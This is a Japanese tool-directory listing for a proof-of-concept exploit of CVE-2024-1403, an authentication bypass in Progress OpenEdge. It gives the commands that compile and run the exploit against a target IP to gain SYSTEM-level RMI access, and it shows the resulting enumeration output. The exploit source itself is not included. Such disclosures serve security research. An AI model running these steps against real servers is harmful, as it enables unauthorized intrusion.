Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-1403 — Progress OpenEdge 認証バイパス | Kitploit
ツール/GitHubGitHub/horizon3ai/cve-2024-1403
認証と認可脆弱性分析エクスプロイトウェブセキュリティペネトレーションテストレッドチーミング
GitHubhorizon3ai/cve-2024-1403

CVE-2024-1403

Progress OpenEdge 認証バイパス

リポジトリを見る
17722年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-1403 Progress OpenEdge 認証バイパス

Progress OpenEdge CVE-2024-1403 のエクスプロイト概念実証(PoC)です。

ブログ記事

詳細はこちら: https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive

使用法

以下の jar ファイルのご自身のバージョンを用意する必要があります:

  • progress.jar
  • oeauth-12.8.-.jar
  • osmetrics.jar
  • juniper.jar

コンパイル

root@kitploit:~
$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java

使用法

このスクリプトを実行すると、NT AUTHORITY\SYSTEM 資格情報を使用して AdminServer RMI インターフェースへの接続を試みます。

root@kitploit:~
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.system.ISystemPlugIn

com.progress.agent.database.AgentPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.agent.database.IAgentPlugIn

com.progress.ubroker.tools.NSRemoteObject
	com.progress.chimera.common.IChimeraHierarchy
	com.progress.ubroker.tools.IYodaRMI
	com.progress.ubroker.tools.IYodaSharedResources

com.progress.ubroker.tools.UBRemoteCommand
	com.progress.chimera.common.IChimeraRemoteCommand

com.progress.juniper.admin.JAPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.juniper.admin.IJAPlugIn

com.progress.agent.smdatabase.SMPlugIn
	com.progress.chimera.common.IChimeraRemoteObject

最新のセキュリティ研究については、Twitter で Horizon3.ai Attack Team をフォローしてください:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

免責事項

本ソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトのメンテナーは、本ソフトウェアの誤用について責任を負いません。責任を持って使用してください。

ツールをダウンロード